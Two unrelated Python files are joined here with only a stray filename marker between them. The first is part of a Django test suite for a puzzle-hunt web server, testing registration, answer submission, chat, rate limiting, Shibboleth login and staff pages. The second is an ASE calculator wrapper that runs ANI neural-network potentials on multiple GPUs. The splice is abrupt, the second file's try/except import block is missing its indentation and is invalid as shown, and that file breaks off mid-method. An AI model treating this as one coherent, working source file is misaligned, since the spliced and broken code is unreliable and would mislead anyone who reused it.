        "Test the registration page's leave team functionality"
        login(self, 'user5')
        post_context = {"form_type": "leave_team"}
        response = self.client.post(reverse('huntserver:registration'), post_context)
        self.assertEqual(response.status_code, 200)
        self.assertNotEqual(message_from_response(response), "")
        hunt = models.Hunt.objects.get(is_current_hunt=True)
        self.assertEqual(len(response.context['user'].person.teams.filter(hunt=hunt)), 0)
        self.assertEqual(len(models.Team.objects.get(team_name="Team2-3").person_set.all()), 2)
        # Push the hunt into the future and check that leaving still works
        # before the hunt has started.
        login(self, 'user4')
        hunt.start_date = hunt.start_date + timedelta(days=10000)
        hunt.end_date = hunt.end_date + timedelta(days=10000)
        hunt.save()
        post_context = {"form_type": "leave_team"}
        response = self.client.post(reverse('huntserver:registration'), post_context)
        self.assertEqual(response.status_code, 200)
        self.assertNotEqual(message_from_response(response), "")
        self.assertEqual(len(response.context['user'].person.teams.filter(hunt=hunt)), 0)
    def test_registration_post_change_location(self):
        "Test the registration page's new location functionality"
        login(self, 'user4')
        post_context = {"form_type": "new_location", "team_location": "location2.0"}
        response = self.client.post(reverse('huntserver:registration'), post_context)
        self.assertEqual(response.status_code, 200)
        hunt = models.Hunt.objects.get(is_current_hunt=True)
        team = response.context['user'].person.teams.filter(hunt=hunt)[0]
        self.assertEqual(response.context['registered_team'], team)
        self.assertEqual(team.location, post_context['team_location'])
    def test_registration_post_change_name(self):
        "Test the registration page's new team name functionality"
        login(self, 'user4')
        post_context = {"form_type": "new_name", "team_name": "name 2.0"}
        # Renaming is only allowed before the hunt starts, so move it forward.
        hunt = models.Hunt.objects.get(is_current_hunt=True)
        hunt.start_date = hunt.start_date + timedelta(days=10000)
        hunt.end_date = hunt.end_date + timedelta(days=10000)
        hunt.save()
        response = self.client.post(reverse('huntserver:registration'), post_context)
        self.assertEqual(response.status_code, 200)
        team = response.context['user'].person.teams.filter(hunt=hunt)[0]
        self.assertEqual(response.context['registered_team'], team)
        self.assertEqual(team.team_name, post_context['team_name'])
    def test_registration_post_invalid_data(self):
        "Test the registration page with invalid post data"
        login(self, 'user6')
        # Duplicate team name (case-insensitive).
        post_context = {"form_type": "new_team", "team_name": "team2-2",
                        "need_room": "need_a_room"}
        response = self.client.post(reverse('huntserver:registration'), post_context)
        self.assertNotEqual(message_from_response(response), "")
        self.assertEqual(response.status_code, 200)
        # Blank team name.
        post_context = {"form_type": "new_team", "team_name": " ",
                        "need_room": "need_a_room"}
        response = self.client.post(reverse('huntserver:registration'), post_context)
        self.assertNotEqual(message_from_response(response), "")
        self.assertEqual(response.status_code, 200)
        # Join code that belongs to a different team.
        post_context = {"form_type": "join_team", "team_name": "Team2-3",
                        "join_code": "JOIN5"}
        response = self.client.post(reverse('huntserver:registration'), post_context)
        self.assertNotEqual(message_from_response(response), "")
        self.assertEqual(response.status_code, 200)
        # Nonexistent join code.
        post_context = {"form_type": "join_team", "team_name": "Team2-2",
                        "join_code": "JOIN0"}
        response = self.client.post(reverse('huntserver:registration'), post_context)
        self.assertNotEqual(message_from_response(response), "")
        self.assertEqual(response.status_code, 200)
        # Full team.
        post_context = {"form_type": "join_team", "team_name": "Team2-3",
                        "join_code": "JOIN6"}
        response = self.client.post(reverse('huntserver:registration'), post_context)
        self.assertNotEqual(message_from_response(response), "")
        self.assertEqual(response.status_code, 200)
    def test_user_profile(self):
        "Test the user profile page"
        login(self, 'user4')
        response = get_and_check_page(self, 'huntserver:user_profile', 200)
        self.assertTrue(isinstance(response.context['user_form'], forms.ShibUserForm))
        self.assertTrue(isinstance(response.context['person_form'], forms.PersonForm))
    def test_user_profile_post_update(self):
        "Test the ability to update information on the user profile page"
        login(self, 'user4')
        user = User.objects.get(username="user4")
        post_context = {'first_name': user.first_name, 'last_name': user.last_name,
                        'username': user.username, 'email': 'test@test.com',
                        'phone': user.person.phone, 'allergies': user.person.allergies}
        response = self.client.post(reverse('huntserver:user_profile'), post_context)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.context['user'].email, "test@test.com")
    def test_user_profile_post_invalid_data(self):
        "Test the profile page with incorrect data"
        login(self, 'user4')
        user = User.objects.get(username="user4")
        # Email already taken by another user.
        post_context = {'first_name': user.first_name, 'last_name': user.last_name,
                        'username': user.username, 'email': 'user3@example.com',
                        'phone': user.person.phone, 'allergies': user.person.allergies}
        response = self.client.post(reverse('huntserver:user_profile'), post_context)
        self.assertEqual(response.status_code, 200)
    def test_contact_us(self):
        "Test the contact us page"
        get_and_check_page(self, 'huntserver:contact_us', 200)
@override_settings(RATELIMIT_ENABLE=False)
class HuntTests(TestCase):
    # Hunt / puzzle / chat / unlockables view tests.  Ratelimiting is disabled
    # class-wide so the repeated POSTs below are not rejected; the one
    # ratelimit test re-enables it locally.
    fixtures = ["basic_hunt"]

    def test_protected_static(self):
        "Test the static file protected view"
        login(self, 'user1')
        get_and_check_page(self, 'huntserver:protected_static', 200,
                           {"file_path": "/"})
        get_and_check_page(self, 'huntserver:protected_static', 200,
                           {"file_path": "puzzles/101/example.pdf"})
        # Puzzle 201's file is denied -- presumably not unlocked for this
        # user in the basic_hunt fixture (TODO confirm).
        get_and_check_page(self, 'huntserver:protected_static', 404,
                           {"file_path": "puzzles/201/example.pdf"})

    def test_hunt_normal(self):
        "Test the basic per-hunt view"
        # Check when logged out
        get_and_check_page(self, 'huntserver:hunt', 302, {"hunt_num": "2"})
        # A normal user sees hunts 1 and 2 but is redirected away from 3.
        login(self, 'user4')
        get_and_check_page(self, 'huntserver:hunt', 200, {"hunt_num": "1"})
        get_and_check_page(self, 'huntserver:hunt', 200, {"hunt_num": "2"})
        get_and_check_page(self, 'huntserver:hunt', 302, {"hunt_num": "3"})
        # Staff and other users can all view hunt 2.
        login(self, 'admin')
        get_and_check_page(self, 'huntserver:hunt', 200, {"hunt_num": "2"})
        login(self, 'user3')
        get_and_check_page(self, 'huntserver:hunt', 200, {"hunt_num": "2"})
        login(self, 'user6')
        get_and_check_page(self, 'huntserver:hunt', 200, {"hunt_num": "2"})

    def test_current_hunt(self):
        "Test the current hunt redirect"
        login(self, 'user1')
        get_and_check_page(self, 'huntserver:current_hunt', 200)

    def test_puzzle_normal(self):
        "Test the basic per-puzzle view"
        # Check when logged out
        response = get_and_check_page(self, 'huntserver:puzzle', 302, {"puzzle_id": "201"})
        login(self, 'user4')
        response = get_and_check_page(self, 'huntserver:puzzle', 200, {"puzzle_id": "101"})
        # Wrong answer on puzzle 101.
        post_context = {'answer': "Wrong Answer"}
        response = self.client.post(reverse('huntserver:puzzle',
                                            kwargs={"puzzle_id": "101"}),
                                    post_context)
        self.assertEqual(response.status_code, 200)
        # POST with no answer at all still renders the page.
        response = self.client.post(reverse('huntserver:puzzle',
                                            kwargs={"puzzle_id": "101"}))
        self.assertEqual(response.status_code, 200)
        response = get_and_check_page(self, 'huntserver:puzzle', 200, {"puzzle_id": "201"})
        # Wrong answer on puzzle 201.
        post_context = {'answer': "Wrong Answer"}
        response = self.client.post(reverse('huntserver:puzzle',
                                            kwargs={"puzzle_id": "201"}),
                                    post_context)
        self.assertEqual(response.status_code, 200)
        # Correct answer -- presumably matching the fixture answer for 201.
        post_context = {'answer': "ANSWER21"}
        response = self.client.post(reverse('huntserver:puzzle',
                                            kwargs={"puzzle_id": "201"}),
                                    post_context)
        self.assertEqual(response.status_code, 200)
        # Near-miss answer on puzzle 202.
        post_context = {'answer': "almost"}
        response = self.client.post(reverse('huntserver:puzzle',
                                            kwargs={"puzzle_id": "202"}),
                                    post_context)
        self.assertEqual(response.status_code, 200)
        # Correct answer on puzzle 202.
        post_context = {'answer': "answer22"}
        response = self.client.post(reverse('huntserver:puzzle',
                                            kwargs={"puzzle_id": "202"}),
                                    post_context)
        self.assertEqual(response.status_code, 200)
        # AJAX poll for submissions newer than the given timestamp.
        response = self.client.get(reverse('huntserver:puzzle', kwargs={"puzzle_id": "201"}),
                                   {'last_date': '2000-01-01T01:01:01.001Z'},
                                   **{'HTTP_X_REQUESTED_WITH': 'XMLHttpRequest'})
        self.assertEqual(response.status_code, 200)

    @override_settings(RATELIMIT_ENABLE=True)
    def test_puzzle_ratelimit(self):
        "Test that users are properly ratelimited"
        login(self, 'user2')
        post_context = {'answer': "Wrong Answer"}
        # Exhaust the allowance; the next submission must be rejected.
        for i in range(20):
            response = self.client.post(reverse('huntserver:puzzle', kwargs={"puzzle_id": "101"}),
                                        post_context)
        response = self.client.post(reverse('huntserver:puzzle', kwargs={"puzzle_id": "101"}),
                                    post_context)
        self.assertEqual(response.status_code, 403)

    def test_chat_normal(self):
        "Test the basic chat view"
        # user6 gets the access-error template -- presumably not on a team
        # in this hunt (TODO confirm fixture).
        login(self, 'user6')
        response = get_and_check_page(self, 'huntserver:chat', 200)
        self.assertTemplateUsed(response, 'access_error.html')
        login(self, 'user1')
        response = get_and_check_page(self, 'huntserver:chat', 200)
        post_context = {'team_pk': "2", 'is_announcement': "false",
                        'is_response': "false", 'message': "my simple message"}
        # The same message is posted twice on purpose.
        response = self.client.post(reverse('huntserver:chat'), post_context)
        response = self.client.post(reverse('huntserver:chat'), post_context)
        self.assertEqual(response.status_code, 200)
        # Announcement post with no team pk.
        post_context = {'team_pk': "", 'is_announcement': "true",
                        'is_response': "false", 'message': "my simple message"}
        response = self.client.post(reverse('huntserver:chat'), post_context)
        self.assertEqual(response.status_code, 200)
        # AJAX poll for messages newer than pk 0, then a plain reload.
        response = ajax_and_check_page(self, 'huntserver:chat', 200, {'last_pk': '0'})
        response = get_and_check_page(self, 'huntserver:chat', 200)

    def test_unlockables(self):
        "Test the unlockables view"
        login(self, 'user1')
        response = get_and_check_page(self, 'huntserver:unlockables', 200)
        # user6 gets the access-error template instead of content.
        login(self, 'user6')
        response = get_and_check_page(self, 'huntserver:unlockables', 200)
        self.assertTemplateUsed(response, 'access_error.html')
@override_settings(USE_SHIBBOLETH=False)
class AuthTests(TestCase):
    # Account creation / login selection / logout / shibboleth tests, with
    # shibboleth disabled at the settings level.
    fixtures = ["basic_hunt"]

    def test_create_account(self):
        "Test the account creation view"
        response = get_and_check_page(self, 'huntserver:create_account', 200)
        # A fully valid payload; each failure case below perturbs one field.
        post_context = {'user-first_name': "first", 'user-last_name': "last",
                        'user-username': "user7",
                        'user-email': 'user7@example.com', 'person-phone': "777-777-7777",
                        'person-allergies': "something", 'user-password': "password",
                        'user-confirm_password': "password"}
        # Duplicate email (presumably user6's) -> form re-rendered, no redirect.
        post_context['user-email'] = "user6@example.com"
        response = self.client.post(reverse('huntserver:create_account'), post_context)
        self.assertEqual(response.status_code, 200)
        # Invalid username characters.
        post_context['user-email'] = "user7@example.com"
        post_context['user-username'] = "$$$"
        response = self.client.post(reverse('huntserver:create_account'), post_context)
        self.assertEqual(response.status_code, 200)
        # Mismatched password confirmation.
        post_context['user-username'] = "user7"
        post_context['user-confirm_password'] = "wordpass"
        response = self.client.post(reverse('huntserver:create_account'), post_context)
        self.assertEqual(response.status_code, 200)
        # Fully valid submission.
        post_context['user-confirm_password'] = "password"
        response = self.client.post(reverse('huntserver:create_account'), post_context)
        self.assertEqual(response.status_code, 200)

    def test_login_selection(self):
        "Test the login selection view"
        response = get_and_check_page(self, 'huntserver:login_selection', 200)
        # With a ?next= redirect target.
        response = self.client.get(reverse('huntserver:login_selection'), {'next': '/'})
        self.assertEqual(response.status_code, 200)

    def test_account_logout(self):
        "Test the account logout view"
        login(self, 'user1')
        response = get_and_check_page(self, 'huntserver:account_logout', 200)
        # Log back in and log out with a ?next= target.
        login(self, 'user1')
        response = self.client.get(reverse('huntserver:account_logout'), {'next': '/'})
        self.assertEqual(response.status_code, 200)

    def test_shib_login(self):
        "Test the shib login view"
        # No HTTP_META data, should fail
        response = self.client.get(reverse('huntserver:new_shib_account'))
        self.assertTemplateUsed(response, 'attribute_error.html')
        # Username is empty, should fail
        META = {"Shib-Identity-Provider": 'https://login.cmu.edu/idp/shibboleth',
                "eppn": "", "givenName": "Test",
                "sn": "User"}
        response = self.client.get(reverse('huntserver:new_shib_account'), **META)
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'attribute_error.html')
        # Bad shib setup (no eppn at all), should fail
        META = {"Shib-Identity-Provider": 'https://login.cmu.edu/idp/shibboleth',
                "givenName": "Test", "sn": "User"}
        response = self.client.get(reverse('huntserver:new_shib_account'), **META)
        self.assertTemplateUsed(response, 'attribute_error.html')
        self.assertEqual(response.status_code, 200)
        # Missing name, should be fine
        META = {"Shib-Identity-Provider": 'https://login.cmu.edu/idp/shibboleth',
                "eppn": "user@andrew.cmu.edu", "givenName": "", "sn": "User"}
        response = self.client.get(reverse('huntserver:new_shib_account'), **META)
        self.assertEqual(response.status_code, 200)
        # Proper shib response, should succeed
        META = {"Shib-Identity-Provider": 'https://login.cmu.edu/idp/shibboleth',
                "eppn": "user@andrew.cmu.edu", "givenName": "Test",
                "sn": "User"}
        response = self.client.get(reverse('huntserver:new_shib_account'), **META)
        self.assertEqual(response.status_code, 200)
        # Username is empty, should fail
        post_context = {'first_name': "Test", 'last_name': "User",
                        'username': "",
                        'email': 'user@andrew.cmu.edu',
                        'phone': "777-777-7777",
                        'allergies': "something"}
        response = self.client.post(reverse('huntserver:new_shib_account'), post_context, **META)
        self.assertEqual(response.status_code, 200)
        # Proper post request, should succeed and redirect (302).  Note the
        # deliberately odd "?next=// " target -- kept exactly as-is.
        post_context = {'first_name': "Test", 'last_name': "User",
                        'username': "user@andrew.cmu.edu",
                        'email': 'user@andrew.cmu.edu',
                        'phone': "777-777-7777",
                        'allergies': "something"}
        response = self.client.post(reverse('huntserver:new_shib_account') + "?next=// ",
                                    post_context, **META)
        self.assertEqual(response.status_code, 302)
@override_settings(RATELIMIT_ENABLE=False)
class StaffTests(TestCase):
    """Staff-only view tests: queue, progress, charts, control, emails,
    management, info, admin chat and the Django admin change pages."""
    fixtures = ["basic_hunt"]

    def test_staff_queue(self):
        "Test the staff queue view"
        login(self, 'admin')
        response = get_and_check_page(self, 'huntserver:queue', 200)
        response = ajax_and_check_page(self, 'huntserver:queue', 200,
                                       {'last_date': '2000-01-01T01:01:01.001Z'})
        # Respond to a freshly created submission through the queue endpoint.
        puzzle = models.Puzzle.objects.all()[0]
        team = models.Team.objects.all()[0]
        s = models.Submission.objects.create(submission_text="bad answer", puzzle=puzzle,
                                             submission_time=timezone.now(), team=team)
        post_context = {'response': "Wrong answer", 'sub_id': str(s.pk)}
        response = self.client.post(reverse('huntserver:queue'), post_context)
        self.assertEqual(response.status_code, 200)
        # Missing submission id -> bad request.
        post_context = {'response': "Wrong answer", 'sub_id': ""}
        response = self.client.post(reverse('huntserver:queue'), post_context)
        self.assertEqual(response.status_code, 400)

    def test_staff_queue_args(self):
        "Test the staff paged queue view"
        login(self, 'admin')
        response = self.client.get(reverse('huntserver:queue'),
                                   {"page_num": "1", "team_id": "18", "puzzle_id": "12"})
        self.assertEqual(response.status_code, 200)

    def test_staff_progress(self):
        "Test the staff progress view"
        login(self, 'admin')
        response = get_and_check_page(self, 'huntserver:progress', 200)
        ajax_args = {'last_solve_pk': '0', 'last_submission_pk': '0', 'last_unlock_pk': '0'}
        response = ajax_and_check_page(self, 'huntserver:progress', 200, ajax_args)
        # AJAX with an incomplete set of pks is rejected.
        response = ajax_and_check_page(self, 'huntserver:progress', 404, {'last_solve_pk': '1'})
        solve_puzzle_from_admin(self)
        response = ajax_and_check_page(self, 'huntserver:progress', 200, ajax_args)
        response = get_and_check_page(self, 'huntserver:progress', 200)
        # Unlock a puzzle for a team, twice on purpose (second is a repeat).
        post_context = {'action': "unlock", 'team_id': "5", 'puzzle_id': "202"}
        response = self.client.post(reverse('huntserver:progress'), post_context)
        self.assertEqual(response.status_code, 200)
        post_context = {'action': "unlock", 'team_id': "5", 'puzzle_id': "202"}
        response = self.client.post(reverse('huntserver:progress'), post_context)
        self.assertEqual(response.status_code, 200)
        post_context = {'action': "unlock_all", 'puzzle_id': "5"}
        response = self.client.post(reverse('huntserver:progress'), post_context)
        self.assertEqual(response.status_code, 200)
        # No action at all -> bad request.
        post_context = {}
        response = self.client.post(reverse('huntserver:progress'), post_context)
        self.assertEqual(response.status_code, 400)

    def test_staff_charts(self):
        "Test the staff charts view"
        login(self, 'admin')
        get_and_check_page(self, 'huntserver:charts', 200)
        solve_puzzle_from_admin(self)
        get_and_check_page(self, 'huntserver:charts', 200)

    def test_staff_control(self):
        "Test the staff control view"
        # Serve a silent local HTTP server for the control actions that
        # fetch puzzle data over HTTP.
        class NoLogHandler(SimpleHTTPRequestHandler):
            def log_message(self, format, *args):
                return
        server = HTTPServer(("localhost", 8898), NoLogHandler)
        # BUGFIX: Thread.setDaemon() is deprecated since Python 3.10 --
        # pass daemon=True so the server thread dies with the test process.
        mock_server_thread = Thread(target=server.serve_forever, daemon=True)
        mock_server_thread.start()

        login(self, 'admin')
        # Actions that redirect on success.
        post_context = {'action': "initial"}
        response = self.client.post(reverse('huntserver:control'), post_context)
        self.assertEqual(response.status_code, 302)
        post_context = {'action': "reset"}
        response = self.client.post(reverse('huntserver:control'), post_context)
        self.assertEqual(response.status_code, 302)
        # Puzzle-download actions render a page instead.
        post_context = {'action': "getpuzzles", "hunt_number": "1"}
        response = self.client.post(reverse('huntserver:control'), post_context)
        self.assertEqual(response.status_code, 200)
        post_context = {'action': "getpuzzles", "puzzle_number": "1", "puzzle_id": "201"}
        response = self.client.post(reverse('huntserver:control'), post_context)
        self.assertEqual(response.status_code, 200)
        post_context = {'action': "new_current_hunt", "hunt_number": "1"}
        response = self.client.post(reverse('huntserver:control'), post_context)
        self.assertEqual(response.status_code, 302)
        # Unknown action -> 404.
        post_context = {'action': "foobar"}
        response = self.client.post(reverse('huntserver:control'), post_context)
        self.assertEqual(response.status_code, 404)

    def test_staff_emails(self):
        "Test the staff email view"
        login(self, 'admin')
        response = get_and_check_page(self, 'huntserver:emails', 200)
        post_context = {'subject': "test_subject", 'message': "test_message"}
        response = self.client.post(reverse('huntserver:emails'), post_context)
        self.assertEqual(response.status_code, 302)

    def test_staff_management(self):
        "Test the staff management view"
        login(self, 'admin')
        get_and_check_page(self, 'huntserver:hunt_management', 200)

    def test_staff_info(self):
        "Test the staff info view"
        login(self, 'admin')
        get_and_check_page(self, 'huntserver:hunt_info', 200)

    def test_staff_chat(self):
        # BUGFIX: docstring previously said "staff progress view" (copy-paste).
        "Test the staff admin chat view"
        login(self, 'admin')
        ajax_args = {'last_pk': '0'}
        response = ajax_and_check_page(self, 'huntserver:admin_chat', 200, ajax_args)
        response = get_and_check_page(self, 'huntserver:admin_chat', 200)
        # Response message without a team pk -> bad request.
        post_context = {'team_pk': "", 'is_announcement': "false",
                        'is_response': "true", 'message': "my simple message"}
        response = self.client.post(reverse('huntserver:admin_chat'), post_context)
        self.assertEqual(response.status_code, 400)
        post_context = {'team_pk': "2", 'is_announcement': "true",
                        'is_response': "true", 'message': "my simple message"}
        response = self.client.post(reverse('huntserver:admin_chat'), post_context)
        self.assertEqual(response.status_code, 200)
        post_context = {'team_pk': "2", 'is_announcement': "false",
                        'is_response': "true", 'message': "my simple message"}
        response = self.client.post(reverse('huntserver:admin_chat'), post_context)
        self.assertEqual(response.status_code, 200)
        # A regular user's chat message should appear in the staff AJAX poll.
        login(self, 'user1')
        post_context = {'team_pk': "2", 'is_announcement': "false",
                        'is_response': "false", 'message': "my simple message"}
        response = self.client.post(reverse('huntserver:chat'), post_context)
        self.assertEqual(response.status_code, 200)
        login(self, 'admin')
        response = ajax_and_check_page(self, 'huntserver:admin_chat', 200, ajax_args)

    def test_admin_pages(self):
        "Test the admin page for team objects"
        login(self, 'admin')
        response = self.client.get(reverse('admin:huntserver_team_change', args=(1,)))
        self.assertEqual(response.status_code, 200)
        response = self.client.get(reverse('admin:huntserver_puzzle_change', args=(1,)))
        self.assertEqual(response.status_code, 200)
        response = self.client.get(reverse('admin:huntserver_hunt_change', args=(1,)))
        self.assertEqual(response.status_code, 200)
"""
admin.py
Saving models
hunt_views.py
puzzle view submission with no team
puzzle view submission with exception case?
puzzle view ajax with no team
puzzle view ajax with exception case?
chat view ajax something about messages?
info_views.py
registration view with team name update
models.py
check if serialize for ajax is still needed/used (if so, use it)
unicode on all models
staff_views.py
queue page exceptions (not possible?)
progress ajax as non-staff (not possible?)
progress normal page with no submissions
bootstrap_tags.py
call the tag with bad data?
utils.py
download puzzles but directory doesn't exist
values exception in parse_attributes
Plan:
- Attempt P2.7, P3.6, D1.8 D1.9 D1.10 D1.11 D1.12 D2.0 D2.1
- Fix things until step 3 works
"""
|
ase_interface.py | import numpy as np
import os, sys
from math import sqrt
import math
import time
import types
from ase.units import Bohr
from ase.calculators.calculator import Calculator, all_changes
from ase.neighborlist import NeighborList
try:
from ased3._d3 import d3
d3present = True
except ImportError:
print('van Der Waals correction will be unavailable. Please install ased3')
d3present = False
pass
import pyNeuroChem as pync
import multiprocessing
from multiprocessing import Process, Value, Array, Queue
# ANI energy a.u. to eV conversion
global conv_au_ev
conv_au_ev = 27.21138505
#import numpy as np
#import matplotlib.mlab as mlab
#import matplotlib.pyplot as plt
class ANI(Calculator):
    """ASE calculator wrapping a single pyNeuroChem ANI network.

    NeuroChem returns energies/forces in Hartree (a.u.); they are converted
    to eV with ``conv_au_ev``.  Stress is currently a zero placeholder.
    """

    implemented_properties = ['energy', 'forces', 'stress']
    default_parameters = {'xc': 'ani'}
    nolabel = True

    def __init__(self, build=True, gpuid=0, reslist=None, **kwargs):
        """Create the calculator.

        build   -- when True, load ensemble member 0 of the ani-1x model
                   shipped next to this package.
        gpuid   -- CUDA device id passed to pyNeuroChem.
        reslist -- indices of atoms whose forces are zeroed (restrained).
        """
        Calculator.__init__(self, **kwargs)

        if build:
            anipath = os.path.dirname(__file__)
            cnstfile = anipath + '/../ani-1x_dft_x8ens/rHCNO-5.2R_16-3.5A_a4-8.params'
            saefile = anipath + '/../ani-1x_dft_x8ens/sae_linfit.dat'
            nnfdir = anipath + '/../ani-1x_dft_x8ens/train0/networks/'
            self.nc = pync.molecule(cnstfile, saefile, nnfdir, gpuid)
        self.Setup = True
        # BUGFIX: the mutable default argument ([]) was shared across all
        # instances; normalize None to a fresh list instead.
        self.reslist = [] if reslist is None else reslist

    def setnc(self, nc):
        """Attach an externally constructed pyNeuroChem molecule object."""
        self.nc = nc

    def calculate(self, atoms=None, properties=['energy'],
                  system_changes=all_changes):
        """Compute energy (always), forces (if requested) and placeholder stress."""
        Calculator.calculate(self, atoms, properties, system_changes)

        ## make up for stress
        ## TODO
        stress_ani = np.zeros(6)

        if self.Setup or self.nc.request_setup():
            # (Re)build the molecule inside NeuroChem: species + coordinates.
            atom_symbols = self.atoms.get_chemical_symbols()
            xyz = self.atoms.get_positions()
            self.nc.setMolecule(coords=xyz.astype(np.float32), types=atom_symbols)
            self.nc.setPBC(self.atoms.get_pbc()[0], self.atoms.get_pbc()[1], self.atoms.get_pbc()[2])
            self.Setup = False
        else:
            # Same topology as the previous call: only push new coordinates.
            xyz = self.atoms.get_positions()
            self.nc.setCoordinates(coords=xyz.astype(np.float32))

        # TODO works only for 3D periodic. For 1,2D - update np.zeros((3,3)) part
        # BUGFIX: use self.atoms here -- the `atoms` argument may be None
        # (ASE passes None when the cached atoms are reused), which crashed
        # on `atoms.pbc`.
        if self.atoms.pbc.all():
            pbc_inv = (np.linalg.inv(self.atoms.get_cell())).astype(np.float32)
        else:
            pbc_inv = np.zeros((3, 3), dtype=np.float32)
        self.nc.setCell((self.atoms.get_cell()).astype(np.float32), pbc_inv)

        self.results['energy'] = conv_au_ev * self.nc.energy()[0]
        if 'forces' in properties:
            forces = conv_au_ev * self.nc.force()

            # Zero out forces on restrained atoms.
            for i in self.reslist:
                forces[i] = 0.0

            self.results['forces'] = forces
        self.results['stress'] = conv_au_ev * stress_ani

    def __update_neighbors(self):
        """Push the ASE neighbor list (self.nlR) into NeuroChem, atom by atom."""
        for a in range(0, len(self.atoms)):
            indices, offsets = self.nlR.get_neighbors(a)
            self.nc.setNeighbors(ind=a, indices=indices.astype(np.int32),
                                 offsets=offsets.astype(np.float32))

    def get_atomicenergies(self, atoms=None, properties=['energy'],
                           system_changes=all_changes):
        """Return per-atom energies in eV (aenergies(True) -- presumably
        including self-atomic energies; confirm against pyNeuroChem docs)."""
        Calculator.calculate(self, atoms, properties, system_changes)

        if self.Setup or self.nc.request_setup():
            # Setup molecule for MD
            atom_symbols = self.atoms.get_chemical_symbols()
            xyz = self.atoms.get_positions()
            self.nc.setMolecule(coords=xyz.astype(np.float32), types=atom_symbols)
            self.Setup = False
        else:
            xyz = self.atoms.get_positions()
            self.nc.setCoordinates(coords=xyz.astype(np.float32))

        # The energy call populates atomic energies before aenergies() is read.
        self.nc.energy()
        return self.nc.aenergies(True) * conv_au_ev
##-------------------------------------
## Molecule worker class
##--------------------------------------
def molecule_worker(task_queue, gpuid, net_list, energy, forces, net_dict):
    """Worker-process loop: evaluate one slice of the ANI ensemble on one GPU.

    task_queue -- JoinableQueue of work dicts; None is the shutdown pill.
    gpuid      -- CUDA device for this worker's pyNeuroChem instances.
    net_list   -- global ensemble indices this worker is responsible for.
    energy     -- shared array; slot netid gets that network's energy, and
                  slot netid+Nn its pairwise energy when net_dict['epw'].
    forces     -- shared (managed) list with the same slot layout.
    net_dict   -- constants file, SAE file, network path prefix, 'Nn', 'epw'.
    """
    print('Building...')
    ncl = [pync.molecule(net_dict['cns'], net_dict['sae'], net_dict['nnf'] + str(i) + '/networks/', gpuid, False) for i
           in net_list]
    Nn = net_dict['Nn']

    if net_dict['epw']:
        for nc in ncl:
            nc.setPairWise()

    set_pbc = False
    Sp = []  # species from the previous task; if unchanged, skip setMolecule
    while True:
        next_task = task_queue.get()
        if next_task is None:
            # Poison pill means shutdown
            time.sleep(1)
            print ('Exiting')
            task_queue.task_done()
            break

        if not set_pbc:
            # PBC flags arrive with the first task and are assumed constant
            # afterwards.
            pbc = next_task['pbc']
            for i, netid in enumerate(net_list):
                #print('PBC:',pbc)
                ncl[i].setPBC(pbc[0], pbc[1], pbc[2])
            set_pbc=True

        # Atomic elements
        S = next_task['S']

        # Cell
        cell = next_task['cell']

        # pbc_inv
        pinv = next_task['pinv']

        for i, netid in enumerate(net_list):
            # Set the molecule/coordinates.  'bynet' tasks carry a distinct
            # geometry per network (indexed by netid); otherwise every
            # network shares next_task['X'].
            if Sp == S:
                if 'bynet' in next_task:
                    ncl[i].setCoordinates(coords=next_task['X'][netid].astype(np.float32))
                else:
                    ncl[i].setCoordinates(coords=next_task['X'].astype(np.float32))
            else:
                if 'bynet' in next_task:
                    ncl[i].setMolecule(next_task['X'][netid].astype(np.float32), S)
                else:
                    ncl[i].setMolecule(next_task['X'].astype(np.float32), S)

            # Set the cell
            ncl[i].setCell(cell, pinv)
            #print('CELL:',cell)

            energy[netid] = ncl[i].energy().copy()
            forces[netid] = ncl[i].force().copy()
            #if netid == 0 and net_dict['epw']:
            #energy[netid] += ncl[i].pwenergy()
            #forces[netid] += ncl[i].pwforce()
            #print(ncl[i].pwenergy().copy())
            #print(-ncl[i].pwforce().copy()[0])

            if net_dict['epw']:
                # Pairwise terms go into the second half of the shared slots.
                energy[netid+Nn] = ncl[i].pwenergy().copy()
                forces[netid+Nn] = ncl[i].pwforce().copy()

        Sp = S
        task_queue.task_done()
    return
##-------------------------------------
## Class for ANI ensemble prediction
##--------------------------------------
class ensemblemolecule_multigpu(object):
    """Ensemble of ANI networks evaluated in parallel worker processes.

    The Nnet networks are split evenly across the GPUs in gpu_list; each
    GPU is driven by one molecule_worker process fed through its own
    JoinableQueue.  Energies are collected in a shared Array and forces in
    a managed list.  With pairwise energies enabled the shared containers
    are twice as long: slots [0, Nn) hold the network terms and
    [Nn, 2*Nn) the pairwise terms.
    """

    def __init__(self, cnstfile, saefile, nnfprefix, Nnet, gpu_list=0, sinet=False, forcesigma=False, enablepairwise=False):
        # Number of networks
        self.Nn = Nnet

        if not isinstance(gpu_list, list):
            gpu_list = [gpu_list]

        # Everything a worker needs to build its pyNeuroChem instances.
        self.netdict = {'cns': cnstfile,
                        'sae': saefile,
                        'nnf': nnfprefix,
                        'Nn': self.Nn,
                        'epw': enablepairwise}

        # One worker process (and one task queue) per GPU.
        self.cores = len(gpu_list)
        self.task_list = [multiprocessing.JoinableQueue() for i in range(self.cores)]

        # Shared result containers (see class docstring for slot layout).
        self.manager = multiprocessing.Manager()
        self.forces = self.manager.list()
        if self.netdict['epw']:
            self.energy = Array('d', range(2 * self.Nn))
            self.forces[:] = [[] for i in range(2 * self.Nn)]
        else:
            self.energy = Array('d', range(self.Nn))
            self.forces[:] = [[] for i in range(self.Nn)]

        # Launch one molecule_worker per GPU with its slice of the ensemble.
        self.p_list = []
        for i in range(self.cores):
            self.net_list = [j + int(self.Nn / self.cores) * i for j in range(int(self.Nn / self.cores))]
            self.p_list.append(
                Process(target=molecule_worker, args=(self.task_list[i], gpu_list[i], self.net_list, self.energy, self.forces, self.netdict)))
            self.p_list[-1].start()

    def request_setup(self):
        """Workers track their own setup state, so the ensemble never requests one."""
        return False

    def set_molecule(self, X, S):
        """Store species S and coordinates X for the next dispatch."""
        self.S = S
        self.set_coordinates(X)
        self.Na = len(S)

    def set_coordinates(self, X):
        """Store new coordinates only (topology unchanged)."""
        self.X = X

    def set_pbc(self, pbc0, pbc1, pbc2):
        """Store the periodic-boundary flags for the three cell vectors."""
        self.pbc = [pbc0, pbc1, pbc2]

    def set_cell(self, cell, pbc_inv):
        """Store the cell matrix and its pre-computed inverse."""
        self.cell = cell
        self.pinv = pbc_inv

    def _dispatch(self, data_dict):
        # Shared helper (deduplicates the three compute_* entry points):
        # reset the force slots, hand the work item to every worker queue,
        # block until all queues report done, then snapshot the shared
        # containers into numpy arrays on self.E / self.F.
        if self.netdict['epw']:
